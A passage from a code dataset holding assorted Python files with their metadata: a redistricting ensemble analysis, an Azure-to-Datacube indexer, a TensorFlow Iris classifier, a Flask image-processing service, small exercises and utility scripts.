chainlength])\n data1 = pandas.DataFrame(sorted(initial_partition[my_electionproxy ].percents(\"Democratic\") ), index=cds)\n data1 = data1.transpose()\n datastruct = []\n #setup parallel list of DataFrames\n for nn in range(poolsize):\n datastruct.append(data1)\n \n #key defs for setting up parallel pool HERE:\n ctx = get_context(\"spawn\")\n p = ctx.Pool(poolsize)\n updated_vals = p.starmap(multichain_run, [(i1, graph, chainlength, my_apportionment, poptol, my_electionproxy, 
my_electionproxy_alternate,\n rsw[i1], rmm[i1], reg[i1], rpp[i1], datastruct[i1], state) for i1 in range(poolsize)])\n \n for i1, rsw_updated, rmm_updated, reg_updated, rpp_updated, datastruct_updated in updated_vals:\n rsw[i1] = rsw_updated\n rmm[i1] = rmm_updated\n reg[i1] = reg_updated\n rpp[i1] = rpp_updated\n datastruct[i1] = datastruct_updated\n #clean up data\n rsw_bak= rsw.copy() #just to be on the safe side\n \n reg_bak = reg.copy()\n \n rmm_bak = rmm.copy()\n datastruct_bak = datastruct.copy()\n for nn in range(poolsize): #clean up since 1st value in each list is a junk '0'\n junk = rsw[nn].pop(0)\n junk = reg[nn].pop(0)\n junk = rmm[nn].pop(0)\n junk = rpp[nn].pop(0)\n \n iter1 = range(chainlength * totsteps) #since the correlation length is 200, only collect every 200th point\n reg_clean = []\n rmm_clean = []\n rsw_clean = []\n rpp_clean = []\n for nn in range(poolsize):\n for kk in iter1: \n if rsw[nn][kk] > -1 : #skip over workers that failed timeout, with -1 in 'won districts'\n reg_clean.append(reg[nn][kk]) \n rmm_clean.append(rmm[nn][kk]) \n rsw_clean.append(rsw[nn][kk]) \n# rpp_clean.append(rpp[nn][kk]) \n \n #data1 = data1.transpose()\n #data1 = pandas.DataFrame((initial_partition[\"SEN12\"].percents(\"Democratic\") ))\n t1=time.time()\n #exec(open(\"condense_datastruct_minimal.py\").read()) #run condense_datastruct.py as a script using this namespace\n # RUN condense_datastruct.py after this to unpack the data structure and plot it\n \n data_condensed = pandas.DataFrame([]) #null dataframe to start\n threadcount = len(datastruct) #depth of datastruct list object\n skipno = 1 # basically, don't skip b/c\n for ii in range(threadcount):\n data_x = datastruct[ii]\n data_x.columns = cds\n sx = data_x.shape\n sx0 = sx[0] #this is the # of iterations per dataframe... 
loop thru these skipping every 100- 200\n data_x.index = range(sx0)\n # indexer = range(skipno-1, sx0+ skipno-1, skipno) #collect data from these rows\n indexer = range(sx0-1)\n for kk in indexer:\n if rsw[ii][kk] > -1: #skip over workers that timed out\n data_condensed= pandas.concat([data_condensed,data_x[kk:kk+1]])\n \n outname = \"redist_data/\" + state + \"_\" + my_apportionment + \"_\" + my_electionproxy + \"x\" + \\\n str(chainlength)+ \"x\" + str(poolsize) + normalize + postfix\n bc.save1(outname,data_condensed, reg_clean, rmm_clean, rsw_clean, rpp_clean, reg, rmm, rsw, rpp)\n print(t1-t0, \"seconds\\n\") \n plt.figure()\n fig, ax = plt.subplots(figsize=(8, 6))\n \n # Draw 50% line\n ax.axhline(0.5, color=\"#cccccc\")\n \n # Draw boxplot\n #data1.boxplot(ax=ax, positions=range(len(data1.columns)))\n data_condensed.boxplot(positions=range(len(data_condensed.columns)))\n # Draw initial plan's Democratic vote %s (.iloc[0] gives the first row)\n plt.plot(sorted(data1.iloc[0]), \"ro\")\n \n # Annotate\n titlestr = state + \" \" + my_apportionment + \" x\" + str(chainlength) + \" x\" + str(poolsize) + normalize\n ax.set_title(titlestr)\n ax.set_ylabel(\"Democratic vote % \" + my_electionproxy)\n ax.set_xlabel(\"Sorted districts\")\n ax.set_ylim(0, 1)\n ax.set_yticks([0, 0.25, 0.5, 0.75, 1])\n \n plt.show()\n","sub_path":"chain_ppartonly_50.py","file_name":"chain_ppartonly_50.py","file_ext":"py","file_size_in_byte":13914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"80728191","text":"import math as ma\nimport matplotlib.pyplot as py\nfrom pylab import *\nimport scipy as sp\nimport numpy as np\nimport files as fi\nimport os\n\nfilename = raw_input(\"Specify file name of orbit to plot: \")\nfortime = float(raw_input(\"How far forward did the orbit run (billions of years)? \"))\nbacktime = float(raw_input(\"How far back did the orbit run? (billions of years)? 
\"))\n\ndef plot_my_shit():\n f = open('pauls_rad_gnuplot_script.gnuplot', 'w')\n f.write(\"reset\\n\")\n f.write(\"set xlabel 'X'\\n\")\n f.write(\"set ylabel 'Y'\\n\")\n f.write(\"set zlabel 'Z'\\n\")\n f.write(\"set xzeroaxis\\n\")\n f.write(\"set yzeroaxis\\n\")\n f.write(\"set zzeroaxis\\n\")\n f.write(\"set xrange [\" + str(x_range[0]) + \":\" + str(x_range[1]) + \"]\\n\")\n f.write(\"set yrange [\" + str(y_range[0]) + \":\" + str(y_range[1]) + \"]\\n\")\n f.write(\"set zrange [\" + str(z_range[0]) + \":\" + str(z_range[1]) + \"]\\n\")\n f.write(\"set size square \\n\")\n f.write(\"set title '\" + plot_title + \"'\\n\")\n f.write(\"set term wxt persist size 900,900 \\n\\n\")\n f.write(\"set output 'orbit.png'\\n\")\n f.write(\"splot 'orbit.1.tab' every 1:2002 using 1:2:3 with points pointtype 7 pointsize 0.1, \\\n\t 'hermus.stars.csv' using 1:2:3 with points pointtype 7 pointsize 1 \\n\")\n f.close()\n os.system(\"gnuplot pauls_rad_gnuplot_script.gnuplot\")","sub_path":"backup_2/make_plots.py","file_name":"make_plots.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"109029298","text":"\"\"\"Crawl Thredds for prefixes and fetch YAML's for indexing\nand dump them into a Datacube instance\n\"\"\"\nimport sys\nimport logging\nfrom typing import Tuple\n\nimport click\nfrom odc.azure import find_blobs, download_yamls\nfrom odc.index import from_yaml_doc_stream\nfrom datacube import Datacube\n\nfrom typing import List, Tuple\n\n\ndef dump_list_to_odc(\n account_url,\n container_name,\n yaml_content_list: List[Tuple[bytes, str, str]],\n dc: Datacube,\n products: List[str],\n **kwargs,\n):\n expand_stream = (\n (account_url + \"/\" + container_name + \"/\" + d[1][:d[1].rfind(\"/\") + 1], d[0]) for d in yaml_content_list if\n d[0] is not None\n )\n\n ds_stream = from_yaml_doc_stream(\n expand_stream, dc.index, products=products, **kwargs\n )\n ds_added = 0\n ds_failed = 0\n # Consume chained streams to DB\n for result in ds_stream:\n ds, err = result\n if err is not None:\n logging.error(err)\n ds_failed += 1\n else:\n logging.info(ds)\n try:\n dc.index.datasets.add(ds)\n ds_added += 1\n except Exception as e:\n logging.error(e)\n ds_failed += 1\n\n return ds_added, ds_failed\n\n\n@click.command(\"azure-to-dc\")\n@click.option(\n \"--skip-lineage\",\n is_flag=True,\n default=False,\n help=\"Default is not to skip lineage. Set to skip lineage altogether.\",\n)\n@click.option(\n \"--fail-on-missing-lineage/--auto-add-lineage\",\n is_flag=True,\n default=True,\n help=(\n \"Default is to fail if lineage documents not present in the database. \"\n \"Set auto add to try to index lineage documents.\"\n ),\n)\n@click.option(\n \"--verify-lineage\",\n is_flag=True,\n default=False,\n help=\"Default is no verification. 
Set to verify parent dataset definitions.\",\n)\n@click.option('--product', '-p', 'product_names',\n help=('Only match against products specified with this option, '\n 'you can supply several by repeating this option with a new product name'),\n multiple=True)\n@click.argument(\"account_url\", type=str, nargs=1)\n@click.argument(\"container_name\", type=str, nargs=1)\n@click.argument(\"credential\", type=str, nargs=1)\n@click.argument(\"prefix\", type=str, nargs=1)\n@click.argument(\"suffix\", type=str, nargs=1)\ndef cli(\n skip_lineage: bool,\n fail_on_missing_lineage: bool,\n verify_lineage: bool,\n account_url: str,\n container_name: str,\n credential: str,\n product_names: List[str],\n prefix: str,\n suffix: str,\n):\n print(f\"Opening AZ Container {container_name} on {account_url}\")\n print(f\"Searching on prefix '{prefix}' for files matching suffix '{suffix}'\")\n yaml_urls = find_blobs(account_url, container_name, credential, prefix, suffix)\n\n print(f\"Found {len(yaml_urls)} datasets\")\n yaml_contents = download_yamls(yaml_urls)\n\n print(f\"Matching to {product_names} products\")\n # Consume generator and fetch YAML's\n dc = Datacube()\n added, failed = dump_list_to_odc(\n account_url,\n container_name,\n yaml_contents,\n dc,\n product_names,\n skip_lineage=skip_lineage,\n fail_on_missing_lineage=fail_on_missing_lineage,\n verify_lineage=verify_lineage\n )\n\n print(f\"Added {added} Datasets, Failed to add {failed} Datasets\")\n","sub_path":"apps/dc_tools/odc/apps/dc_tools/azure_to_dc.py","file_name":"azure_to_dc.py","file_ext":"py","file_size_in_byte":3433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"369869505","text":"from django.urls import include, path\n\nfrom animals.urls import pets_router\nfrom baths.views import BathViewSet\n\napp_name = \"baths\"\n\npets_router.register(\n r\"baths\",\n BathViewSet,\n basename=\"baths\",\n)\n\nurlpatterns = [\n path(\"\", include(pets_router.urls)),\n]\n","sub_path":"src/baths/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"227089585","text":"import nltk\nimport codecs\nfrom itertools import tee, izip\nimport random\n\ndef pairwise(iterable):\n \"s -> (s0,s1), (s1,s2), (s2, s3), ...\"\n a, b = tee(iterable)\n next(b, None)\n return izip(a, b)\n\nimport networkx as nx\nG = nx.DiGraph()\n\nstart_words = set()\nend_words = set()\nwith codecs.open('atthemountainsofmadness', 'r', 'utf-8') as file1,\\\n codecs.open('thealchemist','r','utf-8') as file2:\n text = file1.read() + file2.read()\n sents = nltk.sent_tokenize(text)\n for sent in sents:\n words = nltk.word_tokenize(sent)\n if words and words[0] != '.':\n words = [\"\"] + words\n start_words.add(words[1])\n end_words.add(words[-1])\n G.add_edges_from(list(pairwise(words)))\n\n#print(start_words)\n#print(end_words)\n\nwhile True:\n n = raw_input(\"Show a sentence (Y/n)?\")\n if n.strip().upper() == 'N':\n break\n else:\n # naive random path\n start = random.choice(list(start_words))\n end = random.choice(list(end_words))\n paths = nx.all_simple_paths(G, source=start, target=end)\n # naive join\n print('\\n')\n print(' '.join(next(paths)))\n print('\\n')\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"167298634","text":"# The demons had captured the princess 
(P) and imprisoned her in the bottom-right corner of a dungeon. The dungeon consists of M x N rooms laid out in a 2D grid. Our valiant knight (K) was initially positioned in the top-left room and must fight his way through the dungeon to rescue the princess.\r\n#\r\n# The knight has an initial health point represented by a positive integer. If at any point his health point drops to 0 or below, he dies immediately.\r\n#\r\n# Some of the rooms are guarded by demons, so the knight loses health (negative integers) upon entering these rooms; other rooms are either empty (0's) or contain magic orbs that increase the knight's health (positive integers).\r\n#\r\n# In order to reach the princess as quickly as possible, the knight decides to move only rightward or downward in each step.\r\n#\r\n#\r\n# Write a function to determine the knight's minimum initial health so that he is able to rescue the princess.\r\n#\r\n# For example, given the dungeon below, the initial health of the knight must be at least 7 if he follows the optimal path RIGHT-> RIGHT -> DOWN -> DOWN.\r\n#\r\n# -2 (K)\t-3\t3\r\n# -5\t-10\t1\r\n# 10\t30\t-5 (P)\r\n#\r\n# Notes:\r\n#\r\n# The knight's health has no upper bound.\r\n# Any room can contain threats or power-ups, even the first room the knight enters and the bottom-right room where the princess is imprisoned.\r\nimport sys\r\n# todo interesting wrong solution\r\nclass Solution(object):\r\n def calculateMinimumHP1(self, dungeon):\r\n \"\"\"\r\n :type dungeon: List[List[int]]\r\n :rtype: int\r\n \"\"\"\r\n m = len(dungeon)\r\n n = 0\r\n if m > 0:\r\n n = len(dungeon[0])\r\n\r\n table = [0 for i in range(n)]\r\n result = [0 for i in range(n)]\r\n table[0] = dungeon[0][0]\r\n result[0] = dungeon[0][0]\r\n for i in range(1,n):\r\n table[i] = table[i-1] + dungeon[0][i]\r\n result[i] = min(result[i-1],table[i])\r\n for row in range(1,m):\r\n table[0] = table[0] + dungeon[row][0]\r\n result[0] = min(result[0],table[0])\r\n for i in range(1,n):\r\n if result[i] > result[i-1]:\r\n result[i] = result[i]\r\n table[i] = table[i] + dungeon[row][i]\r\n result[i] = min(result[i], table[i])\r\n else:\r\n result[i] = result[i-1]\r\n table[i] = table[i-1] + dungeon[row][i]\r\n result[i] = min(result[i], table[i])\r\n if result[n-1] > 0:\r\n return 1\r\n else:\r\n return 1-result[n-1]\r\n# \"\"\"\r\n# int calculateMinimumHP(vector > &dungeon) {\r\n#\r\n# if(dungeon.size()==0) return 0;\r\n#\r\n# int row=dungeon.size();\r\n# int col=dungeon[0].size();\r\n#\r\n# for(int i=row-1; i>=0; i--) {\r\n#\r\n# for(int j=col-1; j>=0; j--) {\r\n#\r\n# if(i==row-1 && j==col-1) dungeon[i][j]=max(1, 1-dungeon[i][j]);\r\n# else if(i==row-1) dungeon[i][j]=max(1, dungeon[i][j+1]-dungeon[i][j]);\r\n# else if(j==col-1) dungeon[i][j]=max(1, dungeon[i+1][j]-dungeon[i][j]);\r\n# else dungeon[i][j]=max(1, min(dungeon[i+1][j], dungeon[i][j+1])-dungeon[i][j]);\r\n# }\r\n# }\r\n#\r\n# return dungeon[0][0];\r\n# }\r\n# \"\"\"\r\n def calculateMinimumHP(self, dungeon):\r\n \"\"\"\r\n :type dungeon: List[List[int]]\r\n :rtype: int\r\n \"\"\"\r\n row = len(dungeon)\r\n col = 0\r\n if row > 0:\r\n col = len(dungeon[0])\r\n for i in range(row-1,-1,-1):\r\n for j in range(col-1,-1,-1):\r\n if i == row - 1 and j == col - 1:\r\n dungeon[i][j]=max(1, 1-dungeon[i][j])\r\n elif i == row-1:\r\n dungeon[i][j]=max(1, dungeon[i][j+1]-dungeon[i][j])\r\n elif j == col - 1:\r\n dungeon[i][j]=max(1, dungeon[i+1][j]-dungeon[i][j])\r\n else:\r\n dungeon[i][j]=max(1, min(dungeon[i+1][j], dungeon[i][j+1])-dungeon[i][j])\r\n return 
dungeon[0][0]\r\n\r\n\r\nhh = Solution()\r\ndungeon = [[1,-2,3],[2,-2,-2]]\r\nprint(hh.calculateMinimumHP(dungeon))","sub_path":"174. Dungeon Game.py","file_name":"174. Dungeon Game.py","file_ext":"py","file_size_in_byte":4130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"428664377","text":"import os\nimport random\nimport string\nimport shutil\nfrom PIL import Image\nfrom PIL import ImageFile\nimport sys\n\nUSER_NAME = 'zc465'\nSRC_PATH = 'C:\\\\Users\\\\' + USER_NAME + '\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\\\LocalState\\\\Assets\\\\'\nPATH = 'E:\\\\壁纸'\nTARGET = 'E:\\\\图片\\\\壁纸\\\\'\nDELETE_STR = ''\nPIC_NUM = 0\n\n\ndef init():\n \"\"\"Initialize the working directory and image paths\"\"\"\n global USER_NAME, PATH, SRC_PATH\n\n # manually enter the user name\n # if len(sys.argv) > 1: # sys.argv holds the command-line arguments\n # name = sys.argv[1]\n # else:\n # try:\n # name = input('Enter starting URL: ')\n # except (KeyboardInterrupt, EOFError):\n # name = ''\n # if not name:\n # name = USER_NAME\n # USER_NAME = name\n\n shutil.copytree(SRC_PATH, PATH) # copy the folder\n os.chdir(PATH) # set the current working directory\n # print('Current working directory: ' + os.getcwd())\n # print(SRC_PATH)\n\n\ndef remove_brace():\n \"\"\"Remove the bracketed [] content from file names\"\"\"\n for filename in os.listdir('.'): # walk the current working directory\n if ']' in filename:\n new_name = filename.split(']')[-1] # take the substring after the last ]\n os.rename(filename, new_name) # rename the file\n print('Remove brace: ' + filename + ' -> ' + new_name)\n\n\ndef expand_name():\n \"\"\"Set the file extension\"\"\"\n global PIC_NUM\n for filename in os.listdir('.'): # walk the current working directory\n if '.' not in filename and os.path.isfile(filename): # is this a file without an extension?\n new_name = ''\n for x in range(5): # randomly generate a (possibly repeated) file name\n new_name += random.choice(string.ascii_letters + string.digits)\n os.rename(filename, new_name + '.jpg') # rename the file\n PIC_NUM += 1\n # print('Expand names: ' + filename + ' -> ' + new_name + '.jpg')\n\n\ndef record_file():\n \"\"\"Record invalid images\"\"\"\n global DELETE_STR\n for filename in os.listdir('.'): # walk the current working directory\n try:\n img = Image.open(filename)\n if img.width / img.height < 1.2 or img.width < 500: # keep only wide images\n DELETE_STR += filename + '&' # record the names of non-wide images\n img.close()\n except:\n if 'jpg' in filename:\n DELETE_STR += filename + '&' # record invalid images\n # print('Record csv_file: ' + filename)\n\n\ndef delete_file():\n \"\"\"Delete the recorded and duplicate files\"\"\"\n global DELETE_STR, PIC_NUM\n for filename in DELETE_STR.split('&'): # delete every recorded file\n if 'jpg' in filename:\n os.remove(filename)\n PIC_NUM -= 1\n\n for tar in os.listdir(TARGET):\n for src in os.listdir('.'):\n if compare_image(src, TARGET + tar):\n os.remove(src)\n PIC_NUM -= 1\n continue\n\n\ndef compare_image(img_file1, img_file2):\n \"\"\"Only suitable for comparing completely identical images\"\"\"\n if img_file1 == img_file2:\n return True\n fp1 = open(img_file1, 'rb')\n fp2 = open(img_file2, 'rb')\n\n img1 = Image.open(fp1)\n img2 = Image.open(fp2)\n\n ImageFile.LOAD_TRUNCATED_IMAGES = True\n b = img1 == img2\n\n fp1.close()\n fp2.close()\n\n return b\n\n\n# run only when this module is executed directly, not imported\nif __name__ == '__main__':\n init()\n remove_brace()\n expand_name()\n record_file()\n delete_file()\n print('Finished with %d pictures!' % PIC_NUM)\n","sub_path":"filter_pic.py","file_name":"filter_pic.py","file_ext":"py","file_size_in_byte":3529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"451334418","text":"#! 
/usr/local/bin/python3\nimport sys\n\nlns = sorted(list(map(int, sys.stdin)))\n\nstartJolt = 0\ncurJolt = startJolt\ndeviceJolt = max(lns) + 3\nlns = [startJolt] + lns\nlns2 = lns[1:]\nlns2 += [deviceJolt]\n\ndiff = [b-a for a,b in zip(lns, lns2)]\nprint(diff)\n\njolt3 = diff.count(3)\njolt1 = diff.count(1)\n\nprint(jolt1, jolt3)\nprint(jolt1 * jolt3)\n","sub_path":"d10/d10.py","file_name":"d10.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"510468408","text":"import tensorflow as tf\nimport numpy as np\ntf.set_random_seed(777)\n\n# structure the model as a class\nclass Model():\n\n def __init__(self, sess):\n self.sess = sess\n\n # build the neural network\n def build_net(self):\n learning_rate = 0.001\n num_classes = 3\n\n # input placeholders\n self.X = tf.placeholder(tf.float32, shape=[None, 4])\n self.Y = tf.placeholder(tf.int32, shape=[None, 1]) # Iris species: 3 classes in total, labeled 0-2\n Y_one_hot = tf.one_hot(self.Y, num_classes) # one-hot encode\n self.Y_one_hot = tf.reshape(Y_one_hot, [-1, num_classes])\n self.keep_prob = tf.placeholder(tf.float32)\n\n # layer 1\n W1 = tf.Variable(tf.random_normal([4, 12]), name=\"W1\")\n b1 = tf.Variable(tf.random_normal([12]))\n L1 = tf.nn.relu(tf.matmul(self.X, W1) + b1)\n L1 = tf.nn.dropout(L1, keep_prob=self.keep_prob)\n\n # layer 2\n W2 = tf.Variable(tf.random_normal([12, 12]), name=\"W2\")\n b2 = tf.Variable(tf.random_normal([12]))\n L2 = tf.nn.relu(tf.matmul(L1, W2) + b2)\n L2 = tf.nn.dropout(L2, keep_prob=self.keep_prob)\n\n # layer 3\n W3 = tf.Variable(tf.random_normal([12, num_classes]), name=\"W3\")\n b3 = tf.Variable(tf.random_normal([num_classes]))\n self.hypothesis = tf.matmul(L2, W3) + b3\n\n self.sess.run(tf.initialize_all_variables())\n\n # define cost and optimizer\n cost_inner = tf.nn.softmax_cross_entropy_with_logits(logits=self.hypothesis,\n labels=self.Y_one_hot)\n\n self.cost = tf.reduce_mean(cost_inner)\n self.optimizer = tf.train.AdadeltaOptimizer(learning_rate=learning_rate).minimize(self.cost)\n\n is_equal = tf.equal(tf.arg_max(self.hypothesis, 1),\n tf.arg_max(self.Y_one_hot, 1))\n self.accuracy = tf.reduce_mean(tf.cast(is_equal, tf.float32))\n\n\n def training(self, x_data, y_data):\n return self.sess.run([self.cost, self.optimizer],\n feed_dict={self.X: x_data,\n self.Y: y_data,\n self.keep_prob:0.7})\n\n def predict(self, x_data):\n return self.sess.run(self.hypothesis, feed_dict={self.X: x_data,\n self.keep_prob:1.0})\n\n def get_accuracy(self, x_data, y_data):\n return self.sess.run(self.accuracy, feed_dict={self.X: x_data,\n self.Y: y_data,\n self.keep_prob:1.0})\n\ntraining_epoch = 15\n\n# load and shuffle the data\ndataXY = np.loadtxt('Iris.csv', delimiter=',', dtype=np.float32)\nnp.random.shuffle(dataXY)\n\n# split X/Y and tidy up the columns\ndataX = dataXY[:, :-1]\ndataY = dataXY[:, [-1]]\n\n# split into training and test sets (ratio 8:2)\ntrain_len = int(len(dataX) * 0.8)\ntrainX, testX = dataX[:train_len], dataX[train_len:]\ntrainY, testY = dataY[:train_len], dataY[train_len:]\n\nsess = tf.Session()\nmymodel = Model(sess)\n\n# building neural network\nmymodel.build_net()\n\n# training\nprint(\"Learning started\")\nfor epoch in range(training_epoch):\n c, _ = mymodel.training(trainX, trainY)\n print(\"Epoch:\", epoch, \" Cost:\", c)\nprint(\"Learning finished\")\n\n# get accuracy\nprint(\"Average accuracy:\", mymodel.get_accuracy(testX, 
testY))\n\n\n\n\n","sub_path":"TensorFlow/my-exercise/NN/NN_Iris-data_Class.py","file_name":"NN_Iris-data_Class.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"191134095","text":"from time import sleep\n\n\nclass Grid:\n \"\"\"\n Class to represent a grid\n \"\"\"\n\n def __init__(self, led_height=0, led_width=0, led_on='*', led_off=' '):\n \"\"\"\n Attrs:\n led_height: int\n led_width: int\n led_on: int\n led_off: int\n \"\"\"\n self.led_height = led_height\n self.led_width = led_width\n self.led_on = led_on\n self.led_off = led_off\n self.available_height = led_height - 2\n self.available_width = led_width - 2\n\n def create(self):\n \"\"\"\n Method to create a grid\n\n Returns:\n str, str, str\n \"\"\"\n top_wall = self.led_on * self.led_width\n side_walls = ''\n for _ in range(self.available_height):\n side_walls += self.led_on + self.led_off * self.available_width + self.led_on\n bottom_wall = self.led_on * self.led_width\n return top_wall, side_walls, bottom_wall\n\n def update(self, player):\n \"\"\"\n Method to handle update with each event where we re-draw\n grid with player's current position\n\n Params:\n player: object\n\n Returns:\n grid: str\n \"\"\"\n top_wall, side_walls, bottom_wall = self.create()\n grid = top_wall + side_walls + bottom_wall\n # Convert to a list so that the element can be mutable to add player char\n temp_grid = list(grid)\n # For each step in y, needs to increment by jumps of row width\n y_adjustment = (player.dy - 1) * self.led_width\n # The index position of player marker in the list-formatted grid\n position = self.led_width + player.dx + y_adjustment\n temp_grid[position] = self.led_on\n grid = ''\n grid = grid.join(temp_grid)\n return grid\n\n def display(self, np, grid_height, grid_width, led_count, process_grid):\n \"\"\"\n Method to display grid\n\n Params:\n np: object\n grid_height: int\n grid_width: int\n led_count: int\n process_grid: str\n \"\"\"\n black = (0, 0, 0)\n red = (64, 0, 0)\n green = (0, 64, 0)\n index = 0\n for pixel in range(len(process_grid)):\n led = process_grid[index]\n if led == self.led_on:\n # Turn on the wall led's of the top_wall+1 and the 1-bottom_wall\n if (0 <= index <= grid_width) or \\\n index >= (grid_width * grid_width - grid_width):\n np[index] = red\n else:\n # Turn on the player led at their current location\n np[index] = green\n for _ in range(2, grid_height):\n index_ = grid_height * _\n # Turn on the right wall led's\n np[index_ - 1] = red\n # Turn on the left wall led's less the top two\n np[index_] = red\n elif led == self.led_off:\n # Available movable space less the current player location\n np[index] = black\n else:\n pass\n if index < led_count-1:\n index += 1\n np.write()\n sleep(0.25)\n","sub_path":"Part_14_Classes/0007_escape_room/Grid.py","file_name":"Grid.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"86146506","text":"import logging\nimport operator\nimport os\nimport threading\nfrom argparse import ArgumentParser\n\nfrom flask import Flask\n\nimport rest, processing\n\nAPP_NAME = \"imgproc\"\nAPP_AUTHOR = \"midnight coders\"\nAPP_VERSION = \"unknown\"\n\n\ndef main():\n def setup_logger(dbg):\n logLevel = logging.INFO\n logFormat = \"%(asctime)s [%(levelname)s] %(message)s\"\n\n if dbg:\n logLevel = logging.DEBUG\n logFormat = \"%(asctime)s [%(levelname)s] %(filename)s: %(message)s\"\n\n 
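# apply the chosen level and format to the process-wide root logger\n 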
logging.basicConfig(level=logLevel, format=logFormat)\n\n def show_all_routes(server):\n \"\"\"Display registered routes\"\"\"\n rules = []\n for rule in server.url_map.iter_rules():\n methods = ','.join(sorted(rule.methods))\n rules.append((rule.endpoint, methods, str(rule)))\n\n logging.debug(\"listing routes:\")\n sort_by_rule = operator.itemgetter(2)\n for endpoint, methods, rule in sorted(rules, key=sort_by_rule):\n route = \" {:50s} {:25s} {}\".format(endpoint, methods, rule)\n logging.debug(route)\n\n # parsing cli flags\n parser = ArgumentParser(description=\"Image processing web-service\")\n parser.add_argument(\n \"--serviceurl\",\n help=\"url of this web-service in format \\\"http://:/\\\"\",\n default=os.environ.get(\"SERVICEURL\", None)\n )\n parser.add_argument(\n \"--dbg\",\n help=\"enable debug mode\",\n default=os.environ.get(\"DEBUG\", False)\n )\n\n args = parser.parse_args()\n if not args.serviceurl or len(args.serviceurl.split(':')) < 2:\n exit(parser.print_usage())\n\n service_url: str = args.serviceurl.split(':')[-2][2:]\n port: int = int(args.serviceurl.split(':')[-1][:-1])\n\n setup_logger(args.dbg)\n\n # flask initialization\n app = Flask(__name__)\n\n chroma_key_ctrl = rest.ChromaKeyController(processing.ChromaKeyServiceImpl())\n filtering_ctrl = rest.FilterController(processing.FilteringServiceImpl())\n\n app.register_blueprint(chroma_key_ctrl.blueprint)\n app.register_blueprint(filtering_ctrl.blueprint)\n\n show_all_routes(app)\n\n lock = threading.Lock()\n lock.acquire()\n app.run(host=service_url, port=port, debug=args.dbg, use_reloader=False)\n lock.release()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"imgproc/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"76264490","text":"from django import forms\n\nclass QAForm(forms.Form): \n\tdef __init__(self, *args, **kwargs):\n\t\tquestions = kwargs.pop('questions')\n\t\tsuper(QAForm, self).__init__(*args, **kwargs)\n\t\tcounter = 0\n\t\tfor q in questions:\n\t\t\tself.fields['question-' + str(counter)] = forms.CharField(label=q)\n\t\t\tcounter += 1\n\nclass OrderForm(forms.Form): \n\tzipcode = forms.CharField(max_length=100)","sub_path":"vanilla_milk_431/vanillamilk431/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"416235272","text":"import asyncio\n\nasync def outer():\n print(\"Now you are inside outer\")\n print(\"Waiting for result from phase 1\")\n result1 = await phase1()\n print(\"Waiting for result from phase 2\")\n result2 = await phase2(result1)\n return result1, result2\n\n\nasync def phase1():\n print(\"In phase1\")\n return \"result1\"\n\nasync def phase2(arg):\n print(\"In phase2\")\n return \"Result2 from {}\".format(arg)\n\nevent_loop = asyncio.get_event_loop()\n\ntry:\n return_value = event_loop.run_until_complete(outer())\n print('return value: {!r}'.format(return_value))\nfinally:\n event_loop.close()\n\n","sub_path":"tutorials-docs/pymotw/02_asyncio_coroutine_chain.py","file_name":"02_asyncio_coroutine_chain.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"9616613","text":"\"\"\"\nWrite a GUI-based program that provides two Entry fields, a button and a label. 
When the button is clicked, the value of each Entry should (if possible) be converted into a float. If both conversions succeed, the label should change to the sum of the two numbers. Otherwise it should read \"***ERROR***\".\n\"\"\"\n\n\nfrom tkinter import *\n\nclass Application(Frame):\n\n\n def __init__(self, master=None):\n Frame.__init__(self,master)\n self.pack()\n self.createWidgets()\n\n def createWidgets(self):\n topframe = Frame(self)\n self.top_num = Entry(topframe)\n self.bottom_num = Entry(topframe)\n self.label = Label(topframe, text= \"Output Label\")\n\n self.top_num.pack()\n self.bottom_num.pack()\n self.label.pack()\n topframe.pack(side=TOP)\n\n bottom_frame = Frame(self)\n bottom_frame.pack(side=BOTTOM)\n\n self.hand = Button( text=\"Calculate\", command = self.convert_to_float).pack()\n\n\n def convert_to_float(self):\n a = self.top_num.get()\n b = self.bottom_num.get()\n\n try:\n output = float(a) + float(b)\n except ValueError:\n output = \"***ERROR***\"\n\n self.label.config(text=output)\nroot = Tk()\napp = Application(master=root)\napp.mainloop()","sub_path":"Python/Python 2/P2 HW/GUI 1 hw.py","file_name":"GUI 1 hw.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"136300179","text":"import sys\nimport nltk\n\nif __name__==\"__main__\":\n\n # read the input file\n f = open (sys.argv[1], \"r\")\n txt = f.read()\n\n # create the output file for the NLTK results\n g = open (\"[top10_NLTK]\" + sys.argv[1], \"w\")\n\n # NLTK sentence tokenization\n sentences = nltk.tokenize.sent_tokenize( txt )\n # NLTK word tokenization with counting\n wordcount = {}\n for line in sentences:\n line 